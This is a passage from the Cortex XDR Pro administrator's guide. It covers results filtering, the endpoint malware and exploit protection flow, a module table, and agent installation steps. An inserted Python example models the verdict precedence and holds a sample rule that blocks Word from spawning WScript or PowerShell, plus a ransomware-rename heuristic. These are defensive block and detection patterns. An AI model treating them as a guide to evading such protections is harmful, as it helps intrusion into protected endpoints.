Some fields also support additional operators such as =, !=, Contains, not Contains, *, and !*.
There are three ways you can filter results:
• By column, using the filter next to a field heading
• By building a filter query for one or more fields using the filter builder
• By pivoting from the contents of a cell (show or hide rows containing the value)
Filters are persistent. When you navigate away from the page and return, any filter you added remains active.
To build a filter using one or more fields:

STEP 1 | From a Cortex XDR page, select the filter button.
Cortex XDR adds the filter criteria above the top of the table.

STEP 2 | For each field you want to filter:
1. Select or search for the field.
2. Select the operator by which to match the criteria.
In most cases this is = to include results that match the value you specify, or != to exclude results that match the value.
3. Enter a value to complete the filter criteria.

CMD fields have a 128-character limit. Shorten longer query strings to 127 characters and add an asterisk (*).

Alternatively, you can select Include empty values to create a filter that includes or excludes results where the field has an empty value.

STEP 3 | To add additional filters, click +AND (within the filter brackets) to display results that must
match all specified criteria, or +OR to display results that match any of the criteria.

STEP 4 | Click out of the filter area into the results table to see the results.

STEP 5 | Next steps:


• If at any time you want to remove the filter, click the X next to it. To remove all filters, click the trash
icon.
• Save and Share Filters.

Export Results to File
If needed, you can export the page results for most pages in Cortex XDR to a tab-separated values (TSV) file.

STEP 1 | (Optional) Filter Page Results to reduce the number of results for export.

STEP 2 | Select the export to file button.
Cortex XDR exports any results matching your applied filters in TSV format. When you open the file in another tool, specify the tab as the separator; automatic delimiter detection does not work for multi-event exports.

Save and Share Filters
You can save and share filters across your organization.

• Save a filter:
Saved filters are listed on the Filters tab of the table layout and filter manager menu.
1. Save the active filter.
2. Enter a name to identify the filter.
You can create multiple filters with the same name. Saving a filter with an existing name does not override the existing filter.
3. Choose whether to Share this filter or keep it private for your own use only.

• Share a filter:
You can share a filter across your organization.
1. Select the table layout and filter menu indicated by the three vertical dots, then select Filters.
2. Select the filter to share and click the share icon.
3. If needed, you can later unshare or delete a filter.

Unsharing a filter turns a public filter private. Deleting a shared filter removes it for all users.

Show or Hide Results
As an alternative to building a filter query from scratch or using the column filters, you can pivot from rows
and specific values to define the match criteria to fine tune the results in the table. You can also pivot on
empty values to show only results with empty values or only results that do not have empty values in the
column from which you pivot.

CMD fields are limited to 128 characters. If you pivot on a CMD field with a truncated value,
the app shows or hides all results that match the first 128 characters.

The show or hide action is a temporary means of filtering the results: If you navigate away from the page
and later return, any results you previously hid will appear again.
This option is available for fields which have a finite list of options.
To hide or show only results that match a specific field value:

STEP 1 | Right-click the matching field value by which you want to hide or show.

STEP 2 | Select the desired action:


• Hide rows with <field value>
• Show rows with <field value>
• Hide empty rows
• Show empty rows

Manage Columns and Rows
From Cortex XDR pages, you can manage how you want to view the results table and what information you want the Cortex XDR app to display:
• Adjust row height and column width
• Add or remove fields in the table
Any adjustments you make to the columns or rows persist when you navigate away from and later return to the page.

• Adjust the row height and column width:
1. On the Cortex XDR page, select the menu indicated by three vertical dots to the right of the filter button.
2. In View Configuration, select the desired:
• Row height, ranging from short to tall.
• Column width: narrow, fixed width, or scaled to the column heading.

• Add or remove fields in the table:
1. On a Cortex XDR page, select the menu indicated by three vertical dots to the right of the filter button.
2. Below the column manager, search for a column by name, or select the fields you want to add and clear any fields you want to hide.
Cortex XDR adds or removes the fields in the table as you select or clear them.
3. If desired, drag and drop the fields to change the order in which they appear in the table.

Endpoint Security
Endpoint security features require a Cortex XDR Pro - Endpoint license.

> Endpoint Security Concepts


> Manage Cortex XDR Agents
> Define Endpoint Groups
> About Content Updates
> Endpoint Security Profiles
> Customizable Agent Settings
> Apply Security Profiles to Endpoints
> Exceptions Security Profiles
> Hardened Endpoint Security

Endpoint Security Concepts
• About Cortex XDR Endpoint Protection
• File Analysis and Protection Flow
• Endpoint Protection Capabilities
• Endpoint Protection Modules

About Cortex XDR Endpoint Protection


Cyberattacks are attacks performed on networks or endpoints to inflict damage, steal information, or
achieve other goals that involve taking control of computer systems that do not belong to the attackers.
These adversaries perpetrate cyberattacks either by causing a user to unintentionally run a malicious
executable file, known as malware, or by exploiting a weakness in a legitimate executable file to run
malicious code behind the scenes without the knowledge of the user.
One way to prevent these attacks is to identify executable files, dynamic-link libraries (DLLs), and other
pieces of code to determine if they are malicious and, if so, to prevent them from executing by testing each
potentially dangerous code module against a list of specific, known threat signatures. The weakness of this
method is that it is time-consuming for signature-based antivirus (AV) solutions to identify newly created
threats that are known only to the attacker (also known as zero-day attacks or exploits) and add them to the
lists of known threats, which leaves endpoints vulnerable until signatures are updated.
Cortex XDR takes a more efficient and effective approach to preventing attacks that eliminates the need for
traditional AV. Rather than try to keep up with the ever-growing list of known threats, Cortex XDR sets up a
series of roadblocks—traps, if you will—that prevent the attacks at their initial entry points—the point where
legitimate executable files are about to unknowingly allow malicious access to the system.
Cortex XDR provides a multi-method protection solution with exploit protection modules that target
software vulnerabilities in processes that open non-executable files and malware protection modules that
examine executable files, DLLs, and macros for malicious signatures and behavior. Using this multi-method
approach, the Cortex XDR solution can prevent all types of attacks, whether they are known or unknown
threats.

Exploit Protection Overview
An exploit is a sequence of commands that takes advantage of a bug or vulnerability in a software
application or process. Attackers use these exploits to access and use a system to their advantage. To gain
control of a system, the attacker must exploit a chain of vulnerabilities in the system. Blocking any attempt
to exploit a vulnerability in the chain will block the entire exploitation attempt.
To combat an attack in which an attacker takes advantage of a software exploit or vulnerability, Cortex XDR
employs exploit protection modules (EPMs). Each EPM targets a specific type of exploit attack in the attack
chain. Some capabilities that Cortex XDR EPMs provide are reconnaissance prevention, memory corruption
prevention, code execution prevention, and kernel protection.

Malware Protection Overview


Malicious files, known as malware, are often disguised as or embedded in non-malicious files. These files
can attempt to gain control, gather sensitive information, or disrupt the normal operations of the system.
Cortex XDR prevents malware by employing the Malware Prevention Engine. This approach combines
several layers of protection to prevent both known and unknown malware that has not been seen before
from causing harm to your endpoints. The mitigation techniques that the Malware Prevention Engine
employs vary by the endpoint type:
• Malware Protection for Windows
• Malware Protection for Mac
• Malware Protection for Linux
• Malware Protection for Android
Malware Protection for Windows
• WildFire integration—Enables automatic detection of known malware and analysis of unknown malware
using WildFire threat intelligence.

• Local static analysis—Enables the Cortex XDR agent to use machine learning to analyze unknown files and
issue a verdict. The Cortex XDR agent uses the verdict returned by the local analysis module until it
receives the WildFire verdict from Cortex XDR.
• DLL file protection—Enables Cortex XDR to block known and unknown DLLs on Windows endpoints.
• Office file protection—Enables Cortex XDR to block known and unknown macros when run from
Microsoft Office files on Windows endpoints.
• Behavioral threat protection (Windows 7 SP1 and later versions)—Enables continuous monitoring of
endpoint activity to identify and analyze chains of events—known as causality chains. This enables
Cortex XDR to detect malicious activity that could otherwise appear legitimate if inspected as individual
events. Behavioral threat protection requires Traps agent 6.0 or a later release.
• Evaluation of trusted signers—Permits unknown files that are signed by highly trusted signers to run on
the endpoint.
• Malware protection modules—Targets behaviors—such as those associated with ransomware—and
enables you to block the creation of child processes.
• Policy-based restrictions—Enables you to block files from executing from within specific local folders,
network folders, or external media locations.
• Periodic and automated scanning—Enables you to block dormant malware that has not yet tried to
execute on endpoints.
Malware Protection for Mac
• WildFire integration—Enables automatic detection of known malware and analysis of unknown malware
using WildFire threat intelligence.
• Local static analysis—Enables Cortex XDR to use machine learning to analyze unknown files and issue a
verdict. The Cortex XDR agent uses the verdict returned by the local analysis module until it receives the
WildFire verdict from Cortex XDR.
• Behavioral threat protection—Enables continuous monitoring of endpoint activity to identify and
analyze chains of events—known as causality chains. This enables the Cortex XDR agent to detect
malicious activity that could otherwise appear legitimate if inspected as individual events. Behavioral
threat protection requires Traps agent 6.1 or a later release.
• Mach-O file protection—Enables you to block known malicious and unknown mach-o files on Mac
endpoints.
• DMG file protection—Enables you to block known malicious and unknown DMG files on Mac endpoints.
• Evaluation of trusted signers—Permits unknown files that are signed by trusted signers to run on the
endpoint.
• Periodic and automated scanning—Enables you to block dormant malware that has not yet tried to
execute on endpoints. Scanning requires Cortex XDR agent 7.1 or a later release.
Malware Protection for Linux
• WildFire integration—Enables automatic detection of known malware and analysis of unknown malware
using WildFire threat intelligence. WildFire integration requires Traps agent 6.0 or a later release.
• Local static analysis—Enables the Cortex XDR agent to use machine learning to analyze unknown files
and issue a verdict. The Cortex XDR agent uses the verdict returned by the local analysis module until it
receives the WildFire verdict from Cortex XDR. Local analysis requires Traps agent 6.0 or a later release.
• Behavioral threat protection—Enables continuous monitoring of endpoint activity to identify and
analyze chains of events—known as causality chains. This enables Cortex XDR to detect malicious
activity that could otherwise appear legitimate if inspected as individual events. Behavioral threat
protection requires Traps agent 6.1 or a later release.
• ELF file protection—Enables you to block known malicious and unknown ELF files executed on a host
server or within a container on a Cortex XDR-protected endpoint. Cortex XDR automatically suspends
the file execution until a WildFire or local analysis verdict is obtained. ELF file protection requires Traps
agent 6.0 or a later release.
• Malware protection modules—Targets the execution behavior of a file—such as those associated with
reverse shell protection.

Malware Protection for Android
• WildFire integration—Enables automatic detection of known malware and grayware, and analysis of
unknown APK files using WildFire threat intelligence.
• APK files examination—Analyze and prevent malicious APK files from running.
• Evaluation of trusted signers—Permits unknown files that are signed by trusted signers to run on the
Android device.

File Analysis and Protection Flow


The Cortex XDR agent utilizes advanced multi-method protection and prevention techniques to protect
your endpoints from both known and unknown malware and software exploits.

Exploit Protection for Protected Processes


In a typical attack scenario, an attacker attempts to gain control of a system by first corrupting or bypassing
memory allocation or handlers. Using memory-corruption techniques, such as buffer overflows and heap
corruption, a hacker can trigger a bug in software or exploit a vulnerability in a process. The attacker must
then manipulate a program to run code provided or specified by the attacker while evading detection. If the
attacker gains access to the operating system, the attacker can then upload malware, such as Trojan horses
(programs that contain malicious executable files), or can otherwise use the system to their advantage. The
Cortex XDR agent prevents such exploit attempts by employing roadblocks—or traps—at each stage of an
exploitation attempt.

When a user opens a non-executable file, such as a PDF or Word document, and the process that opened
the file is protected, the Cortex XDR agent seamlessly injects code into the software. This occurs at the
earliest possible stage before any files belonging to the process are loaded into memory. The Cortex XDR
agent then activates one or more protection modules inside the protected process. Each protection module
targets a specific exploitation technique and is designed to prevent attacks on program vulnerabilities based
on memory corruption or logic flaws.
In addition to automatically protecting processes from such attacks, the Cortex XDR agent reports any
security events to Cortex XDR and performs additional actions as defined in the endpoint security policy.
Common actions that the Cortex XDR agent performs include collecting forensic data and notifying the user
about the event.
The default endpoint security policy protects the most vulnerable and most commonly used applications but
you can also add other third-party and proprietary applications to the list of protected processes.

Malware Protection
The Cortex XDR agent provides malware protection in a series of four evaluation phases:

Phase 1: Evaluation of Child Process Protection Policy


When a user attempts to run an executable, the operating system attempts to run the executable as a
process. If the process tries to launch any child processes, the Cortex XDR agent first evaluates the child
process protection policy. If the parent process is a known targeted process that attempts to launch a
restricted child process, the Cortex XDR agent blocks the child processes from running and reports the
security event to Cortex XDR. For example, if a user tries to open a Microsoft Word document (using the
winword.exe process) and that document has a macro that tries to run a blocked child process (such as
WScript), the Cortex XDR agent blocks the child process and reports the event to Cortex XDR. If the parent
process does not try to launch any child processes or tries to launch a child process that is not restricted,
the Cortex XDR agent next moves to Phase 2: Evaluation of the Restriction Policy.
Phase 2: Evaluation of the Restriction Policy
When a user or machine attempts to open an executable file, the Cortex XDR agent first evaluates the child
process protection policy as described in Phase 1: Evaluation of Child Process Protection Policy. The Cortex
XDR agent next verifies that the executable file does not violate any restriction rules. For example, you
might have a restriction rule that blocks executable files launched from network locations. If a restriction
rule applies to an executable file, the Cortex XDR agent blocks the file from executing and reports the
security event to Cortex XDR and, depending on the configuration of each restriction rule, the Cortex XDR
agent can also notify the user about the prevention event.
If no restriction rules apply to an executable file, the Cortex XDR agent next moves to Phase 3: Hash
Verdict Determination.
Phase 3: Hash Verdict Determination
The Cortex XDR agent calculates a unique hash using the SHA-256 algorithm for every file that attempts to
run on the endpoint. Depending on the features that you enable, the Cortex XDR agent performs additional
analysis to determine whether an unknown file is malicious or benign. The Cortex XDR agent can also
submit unknown files to Cortex XDR for in-depth analysis by WildFire.
To determine a verdict for a file, the Cortex XDR agent evaluates the file in the following order:

1. Hash exception—A hash exception enables you to override the verdict for a specific file without
affecting the settings in your Malware Security profile. The hash exception policy is evaluated first and
takes precedence over all other methods to determine the hash verdict.
For example, you may want to configure a hash exception for any of the following situations:
• You want to block a file that has a benign verdict.
• You want to allow a file that has a malware verdict to run. In general, we recommend that you
only override the verdict for malware after you use available threat intelligence resources—such as
WildFire and AutoFocus—to determine that the file is not malicious.
• You want to specify a verdict for a file that has not yet received an official WildFire verdict.
After you configure a hash exception, Cortex XDR distributes it at the next heartbeat communication
with any endpoints that have previously opened the file.
When a file launches on the endpoint, the Cortex XDR agent first evaluates any relevant hash exception
for the file. The hash exception specifies whether to treat the file as malware. If the file is assigned a
benign verdict, the Cortex XDR agent permits it to open.
If a hash exception is not configured for the file, the Cortex XDR agent next evaluates the verdict to
determine the likelihood of malware. The Cortex XDR agent uses a multi-step evaluation process in
the following order to determine the verdict: Highly trusted signers, WildFire verdict, and then Local
analysis.
2. Highly trusted signers (Windows and Mac)—The Cortex XDR agent distinguishes highly trusted signers
such as Microsoft from other known signers. To keep parity with the signers defined in WildFire, Palo
Alto Networks regularly reviews the list of highly trusted and known signers and delivers any changes
with content updates. The list of highly trusted signers also includes signers that are included in the
allow list from Cortex XDR. When an unknown file attempts to run, the Cortex XDR agent applies the
following evaluation criteria: Files signed by highly trusted signers are permitted to run and files signed
by signers in the block list are blocked, regardless of the WildFire verdict. Otherwise, when a file is not
signed by a highly trusted signer or by a signer included in the block list, the Cortex XDR agent next
evaluates the WildFire verdict. For Windows endpoints, evaluation of other known signers takes place if
WildFire evaluation returns an unknown verdict for the file.
3. WildFire verdict—If a file is not signed by a highly trusted signer on Windows and Mac endpoints, the
Cortex XDR agent performs a hash verdict lookup to determine if a verdict already exists in its local
cache.
If the executable file has a malware verdict, the Cortex XDR agent reports the security event to the
Cortex XDR and, depending on the configured behavior for malicious files, the Cortex XDR agent then
does one of the following:
• Blocks the malicious executable file
• Blocks and quarantines the malicious executable file
• Notifies the user about the file but still allows the file to execute
• Logs the issue without notifying the user and allows the file to execute.
If the verdict is benign, the Cortex XDR agent moves on to the next stage of evaluation (see Phase 4:
Evaluation of Malware Security Policy).
If the hash does not exist in the local cache or has an unknown verdict, the Cortex XDR agent next
evaluates whether the file is signed by a known signer.
4. Local analysis—When an unknown executable, DLL, or macro attempts to run on a Windows or
Mac endpoint, the Cortex XDR agent uses local analysis to determine if it is likely to be malware. On
Windows endpoints, if the file is signed by a known signer, the Cortex XDR agent permits the file to
run and does not perform additional analysis. For files on Mac endpoints and files that are not signed
by a known signer on Windows endpoints, the Cortex XDR agent performs local analysis to determine
whether the file is malware. Local analysis uses a static set of pattern-matching rules that inspect
multiple file features and attributes, and a statistical model that was developed with machine learning

on WildFire threat intelligence. The model enables the Cortex XDR agent to examine hundreds of
characteristics for a file and issue a local verdict (benign or malicious) while the endpoint is offline or
Cortex XDR is unreachable. The Cortex XDR agent can rely on the local analysis verdict until it receives
an official WildFire verdict or hash exception.
Local analysis is enabled by default in a Malware Security profile. Because local analysis always returns a
verdict for an unknown file, if you enable the Cortex XDR agent to Block files with unknown verdict, the
agent only blocks unknown files if a local analysis error occurs or local analysis is disabled. To change the
default settings (not recommended), see Add a New Malware Security Profile.
Phase 4: Evaluation of Malware Security Policy
If the prior evaluation phases do not identify a file as malware, the Cortex XDR agent observes the behavior
of the file and applies additional malware protection rules. If a file exhibits malicious behavior, such as
encryption-based activity common with ransomware, the Cortex XDR agent blocks the file and reports the
security event to the Cortex XDR.
If no malicious behavior is detected, the Cortex XDR agent permits the file (process) to continue running but
continues to monitor the behavior for the lifetime of the process.
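The four evaluation phases above, written out as a decision procedure. This is an added example and not Palo Alto Networks code: the signer lists, child-process rule, restricted path prefixes, hash exception table, WildFire cache and the local-analysis heuristic are all constructed stand-ins for the product's content updates, policy and machine-learning model. What the example preserves is the precedence order the guide describes: child-process policy, then restriction rules, then hash exception over highly trusted and blocked signers over the cached WildFire verdict over known signers (Windows only) over local analysis, and finally behavioral monitoring of whatever is allowed to run.

```python
"""Model of the Cortex XDR agent's four-phase malware evaluation order.

Added example, not Palo Alto Networks code. The signer lists, policy tables
and the local-analysis heuristic are constructed stand-ins for the product's
content updates and ML model; only the precedence logic follows the guide.
"""
import hashlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

HIGHLY_TRUSTED_SIGNERS = {"Microsoft Corporation"}   # assumed content
KNOWN_SIGNERS = {"Example Software Ltd."}            # assumed content
BLOCKED_SIGNERS = {"Revoked Vendor Inc."}            # assumed block list


@dataclass
class File:
    path: str
    data: bytes
    signer: Optional[str] = None
    parent: Optional[str] = None   # process image launching this file, if any


@dataclass
class Policy:
    platform: str = "windows"
    # Phase 1: targeted parent -> child images it may not spawn (assumed rule)
    child_process_rules: Dict[str, set] = field(default_factory=lambda: {
        "winword.exe": {"wscript.exe", "powershell.exe"}})
    # Phase 2: path prefixes executables may not run from (UNC = network share)
    restricted_prefixes: Tuple[str, ...] = ("\\\\", "c:\\users\\public\\downloads")
    hash_exceptions: Dict[str, str] = field(default_factory=dict)  # sha256 -> verdict
    wildfire_cache: Dict[str, str] = field(default_factory=dict)   # sha256 -> verdict
    on_malware: str = "block_and_quarantine"  # block | block_and_quarantine | notify | log
    local_analysis_enabled: bool = True
    block_unknown: bool = True                # "Block files with unknown verdict"


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def local_analysis(data: bytes) -> str:
    """Stand-in for the ML model: a constructed marker string means malware."""
    return "malware" if b"EVIL_MARKER" in data else "benign"


def hash_verdict(f: File, p: Policy) -> Tuple[str, str]:
    """Phase 3: returns (verdict, source) in the guide's precedence order."""
    h = sha256(f.data)
    if h in p.hash_exceptions:                      # 1. admin override wins
        return p.hash_exceptions[h], "hash_exception"
    if p.platform in ("windows", "mac"):            # 2. signer lists
        if f.signer in HIGHLY_TRUSTED_SIGNERS:
            return "benign", "highly_trusted_signer"
        if f.signer in BLOCKED_SIGNERS:
            return "malware", "blocked_signer"
    verdict = p.wildfire_cache.get(h, "unknown")    # 3. cached WildFire verdict
    if verdict != "unknown":
        return verdict, "wildfire"
    if p.platform == "windows" and f.signer in KNOWN_SIGNERS:
        return "benign", "known_signer"             # Windows only, after WildFire
    if p.local_analysis_enabled:                    # 4. local analysis
        try:
            return local_analysis(f.data), "local_analysis"
        except Exception:                           # analysis error: fall through
            pass
    # Only reached when local analysis is off or failed; this is where the
    # "Block files with unknown verdict" setting actually has an effect.
    return ("malware" if p.block_unknown else "unknown"), "unknown_verdict"


def evaluate(f: File, p: Policy) -> Tuple[str, str]:
    """Phases 1-4 for one execution attempt; returns (action, reason)."""
    image = f.path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if f.parent and image in p.child_process_rules.get(f.parent.lower(), set()):
        return "block", f"child_process:{f.parent.lower()}->{image}"
    for prefix in p.restricted_prefixes:
        if f.path.lower().startswith(prefix):
            return "block", f"restriction:{prefix}"
    verdict, source = hash_verdict(f, p)
    if verdict == "malware":
        action = {"block": "block", "block_and_quarantine": "quarantine",
                  "notify": "allow_notify", "log": "allow_log"}[p.on_malware]
        return action, f"{source}:malware"
    # benign, or unknown and allowed: it runs, but Phase 4 keeps watching it
    return "allow_monitor", f"{source}:{verdict}"


def monitor_behavior(events: List[str], threshold: int = 20) -> str:
    """Phase 4 stand-in: a burst of renames to a ransom extension is blocked."""
    hits = sum(1 for e in events if e.startswith("rename:") and e.endswith(".locked"))
    return "block" if hits >= threshold else "allow"
```

Two details of the order are worth checking against your own profiles. A hash exception outranks even a highly trusted signer, so an exception that marks a Microsoft-signed binary as malware will quarantine it. And with local analysis enabled, every unknown file receives a local verdict, so the "Block files with unknown verdict" setting only changes behavior when local analysis is disabled or fails.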

Endpoint Protection Capabilities


Each security profile provides a tailored list of protection capabilities that you can configure for the
platform you select. The following list describes the protection capabilities you can customize in a security
profile. The platforms that support each capability are given in parentheses after its name.

Exploit Security Profiles

Browser Exploits Protection (Windows, Mac)
Browsers can be subject to exploitation attempts from malicious web pages and exploit kits that are
embedded in compromised websites. By enabling this capability, the Cortex XDR agent automatically
protects browsers from common exploitation attempts.

Logical Exploits Protection (Windows, Mac)
Attackers can use existing mechanisms in the operating system—such as DLL-loading processes or built-in
system processes—to execute malicious code. By enabling this capability, the Cortex XDR agent
automatically protects endpoints from attacks that try to leverage common operating system mechanisms
for malicious purposes.

Known Vulnerable Processes Protection (Windows, Mac, Linux)
Common applications in the operating system, such as PDF readers, Office applications, and even processes
that are a part of the operating system itself can contain bugs and vulnerabilities that an attacker can
exploit. By enabling this capability, the Cortex XDR agent protects these processes from attacks which try
to exploit known process vulnerabilities.

Exploit Protection for Additional Processes (Windows, Mac, Linux)
To extend protection to third-party processes that are not protected by the default policy from
exploitation attempts, you can add additional processes to this capability.

Operating System Exploit Protection (Windows, Mac, Linux)
Attackers commonly leverage the operating system itself to accomplish a malicious action. By enabling this
capability, the Cortex XDR agent protects operating system mechanisms such as privilege escalation and
prevents them from being used for malicious purposes.

Malware Security Profiles

Behavioral Threat Protection (Windows, Mac, Linux)
Prevents sophisticated attacks that leverage built-in OS executables and common administration utilities
by continuously monitoring endpoint activity for malicious causality chains.

Ransomware Protection (Windows)
Targets encryption-based activity associated with ransomware to analyze and halt ransomware before any
data loss occurs.

Prevent Malicious Child Process Execution (Windows)
Prevents script-based attacks used to deliver malware by blocking known targeted processes from
launching child processes commonly used to bypass traditional security approaches.

Portable Executables and DLLs Examination (Windows)
Analyze and prevent malicious executable and DLL files from running.

ELF Files Examination (Linux)
Analyze and prevent malicious ELF files from running.

Local File Threat Examination (Linux)
Analyze and quarantine malicious PHP files arriving from the web server.

Office Files Examination (Windows)
Analyze and prevent malicious macros embedded in Microsoft Office files from running.

Mach-O Files Examination (Mac)
Analyze and prevent malicious Mach-O files from running.

DMG Files Examination (Mac)
Analyze and prevent malicious DMG files from running.

APK Files Examination (Android)
Analyze and prevent malicious APK files from running.

Reverse Shell Protection (Linux)
Detect suspicious or abnormal network activity from shell processes and terminate the malicious shell
process.

Restrictions Security Profiles

Execution Paths (Windows)
Many attack scenarios are based on writing malicious executable files to certain folders such as the local
temp or download folder and then running them. Use this capability to restrict the locations from which
executable files can run.

Network Locations (Windows)
To prevent attack scenarios that are based on writing malicious files to remote folders, you can restrict
access to all network locations except for those that you explicitly trust.

Removable Media (Windows)
To prevent malicious code from gaining access to endpoints using external media such as a removable
drive, you can restrict the executable files that users can launch from external drives attached to the
endpoints in your network.

Optical Drive (Windows)
To prevent malicious code from gaining access to endpoints using optical disc drives (CD, DVD, and
Blu-ray), you can restrict the executable files that users can launch from optical disc drives connected to
the endpoints in your network.

Endpoint Protection Modules


Each security profile applies multiple security modules to protect your endpoints from a wide range of
attack techniques. While the settings for each module are not configurable, the Cortex XDR agent activates
a specific protection module depending on the type of attack, the configuration of your security policy, and
the operating system of the endpoint. When a security event occurs, the Cortex XDR agent logs details
about the event including the security module employed by the Cortex XDR agent to detect and prevent
the attack based on the technique. To help you understand the nature of the attack, the alert identifies the
protection module the Cortex XDR agent employed.
The following table lists the modules and the platforms on which they are supported. A dash (—) indicates
the module is not supported.

Module Windows Mac Linux Android

Anti-Ransomware — — —
Targets encryption-based
activity associated with
ransomware and has the
ability to analyze and
halt ransomware activity
before any data loss
occurs.

APC Protection — — —
Prevents attacks that
change the execution
order of a process
by redirecting an

82 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security


© 2020 Palo Alto Networks, Inc.
Module Windows Mac Linux Android
asynchronous procedure
call (APC) to point to the
malicious shellcode.

Behavioral Threat —
Prevents sophisticated
attacks that leverage
built-in OS executables
and common
administration utilities by
continuously monitoring
endpoint activity for
malicious causality chains.

Brute Force Protection — — —


Prevents attackers
from hijacking the
process control flow
by monitoring memory
layout enumeration
attempts.

Child Process Protection — — —


Prevents script-based
attacks that are used
to deliver malware,
such as ransomware, by
blocking known targeted
processes from launching
child processes that
are commonly used to
bypass traditional security
approaches.

CPL Protection — — —
Protects against
vulnerabilities related to
the display routine for
Windows Control Panel
Library (CPL) shortcut
images, which can be used
as a malware infection
vector.

Data Execution — — —
Prevention (DEP)
Prevents areas of memory
defined to contain
only data from running
executable code.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 83


© 2020 Palo Alto Networks, Inc.
Module Windows Mac Linux Android

DLL Hijacking — — —
Prevents DLL-hijacking
attacks where the
attacker attempts to load
dynamic-link libraries
on Windows operating
systems from unsecure
locations to gain control
of a process.

DLL Security — — —
Prevents access to crucial
DLL metadata from
untrusted code locations.

Dylib Hijacking — — —
Prevents Dylib-hijacking
attacks where the
attacker attempts to load
dynamic libraries on Mac
operating systems from
unsecure locations to gain
control of a process.

Exploit Kit Fingerprint — — —


Protects against the
fingerprinting technique
used by browser
exploit kits to identify
information—such as the
OS or applications which
run on an endpoint—that
attackers can leverage
when launching an attack
to evade protection
capabilities.

Font Protection — — —
Prevents improper font
handling, a common
target of exploits.

Gatekeeper Enhancement — — —
Enhances the macOS
gatekeeper functionality
that allows apps to run
based on their digital
signature. This module
provides an additional

84 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security


© 2020 Palo Alto Networks, Inc.
Module Windows Mac Linux Android
layer of protection by
extending gatekeeper
functionality to child
processes so you can
enforce the signature
level of your choice.

Hash Exception
Halts execution of files
that an administrator
identified as malware
regardless of the WildFire
verdict.

Hot Patch Protection — — —


Prevents the use of
system functions
to bypass DEP and
address space layout
randomization (ASLR).

Java Deserialization — — —
Blocks attempts to
execute malicious code
during the Java objects
deserialization process on
Java-based servers.

JIT — —
Prevents an attacker
from bypassing the
operating system's
memory mitigations
using just-in-time (JIT)
compilation engines.

Kernel Integrity Monitor — — —


(KIM)
Prevents rootkit and
vulnerability exploitation
on Linux endpoints.
On the first detection
of suspicious rootkit
behavior, the behavioral
threat protection (BTP)
module generates an
XDR Agent alert. Cortex
XDR stitches logs about
the process that loaded
the kernel module with

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 85


© 2020 Palo Alto Networks, Inc.
Module Windows Mac Linux Android
other logs relating to
the kernel module to aid
in alert investigation.
When the Cortex XDR
agent detects subsequent
rootkit behavior, it blocks
the activity.

Local Analysis —
Examines hundreds of
characteristics of an
unknown executable
file, DLL, or macro to
determine if it is likely
to be malware. The local
analysis module uses
a static set of pattern-
matching rules that
inspect multiple file
features and attributes,
and a statistical model
that was developed
using machine learning
on WildFire threat
intelligence.

Local Threat Evaluation — — —


Engine (LTEE)
Protects against malicious
PHP files arriving from the
web server.

Local Privilege Escalation —


Protection
Prevents attackers from
performing malicious
activities that require
privileges that are higher
than those assigned to
the attacked or malicious
process.

Null Dereference — — —
Prevents malicious code
from mapping to address
zero in the memory space,
making null dereference
vulnerabilities
unexploitable.

86 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security


© 2020 Palo Alto Networks, Inc.
Module Windows Mac Linux Android

Restricted Execution - Local Path — — —
Prevents unauthorized execution from a local path.

Restricted Execution - Network Location — — —
Prevents unauthorized execution from a network path.

Restricted Execution - Removable Media — — —
Prevents unauthorized execution from removable media.

Reverse Shell Protection — — —
Blocks malicious activity where an attacker redirects standard input and output streams to network sockets.

ROP —
Protects against the use of return-oriented programming (ROP) by protecting APIs used in ROP chains.

SEH — — —
Prevents hijacking of the structured exception handler (SEH), a commonly exploited control structure that can contain multiple SEH blocks that form a linked list chain, which contains a sequence of function records.

Shellcode Protection — — —
Reserves and protects certain areas of memory commonly used to house payloads using heap spray techniques.

ShellLink — — —
Prevents shell-link logical vulnerabilities.

SO Hijacking Protection — — —
Prevents dynamic loading of libraries from unsecure locations to gain control of a process.

SysExit — — —
Prevents using system calls to bypass other protection capabilities.

UASLR — — —
Improves or altogether implements ASLR (address space layout randomization) with greater entropy, robustness, and strict enforcement.

Vulnerable Drivers Protection — — —
Detects attempts to load vulnerable drivers.

WildFire
Leverages WildFire for threat intelligence to determine whether a file is malware. In the case of unknown files, Cortex XDR can forward samples to WildFire for in-depth analysis.

WildFire Post-Detection (Malware and Grayware)
Identifies a file that was previously allowed to run on an endpoint that is now determined to be malware. Post-detection events provide notifications for each endpoint on which the file executed.

Manage Cortex XDR Agents
• Create an Agent Installation Package
• Set an Application Proxy for Cortex XDR Agents
• Move Cortex XDR Agents Between Managing XDR Servers
• Upgrade Cortex XDR Agents
• Delete Cortex XDR Agents
• Uninstall the Cortex XDR Agent
• Set an Alias for an Endpoint

Create an Agent Installation Package


To install the Cortex XDR agent on the endpoint for the first time, you must first create an agent installation
package. After you create and download an installation package, you can then install it directly on an
endpoint or you can use a software deployment tool of your choice to distribute the software to multiple
endpoints. To install the Cortex XDR agent, you must use a valid installation package that exists in your
Cortex XDR management console. If you delete an installation package, any agents installed from this
package are not able to register to Cortex XDR.
After you install the Cortex XDR agent for the first time, you can upgrade individual or batches of agents
remotely from the Cortex XDR management console.
To create a new installation package:

STEP 1 | From Cortex XDR, select Endpoints > Endpoint Management > Agent Installations.

STEP 2 | Create a new installation package.

STEP 3 | Enter a unique Name and an optional Description to identify the installation package.
The package Name must be no more than 100 characters and can contain letters, numbers, hyphens,
underscores, commas, and spaces.

STEP 4 | Select the Package Type.


• Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered
endpoint that is connected to Cortex XDR.
• (Windows, macOS, and Linux only) Upgrade from ESM—Use this package to upgrade Traps agents that
connect to the on-premises Traps Endpoint Security Manager to Cortex XDR.

STEP 5 | Select the Platform for which you want to create the installation package.

STEP 6 | (Windows, macOS, and Linux only) Select the Agent Version for the package.

STEP 7 | Create the installation package.


Cortex XDR prepares your installation package and makes it available on the Agent Installations page.

STEP 8 | Download your installation package.


When the status of the package shows Completed, right-click the agent version, and click Download.
• For Windows endpoints, select the architecture type.
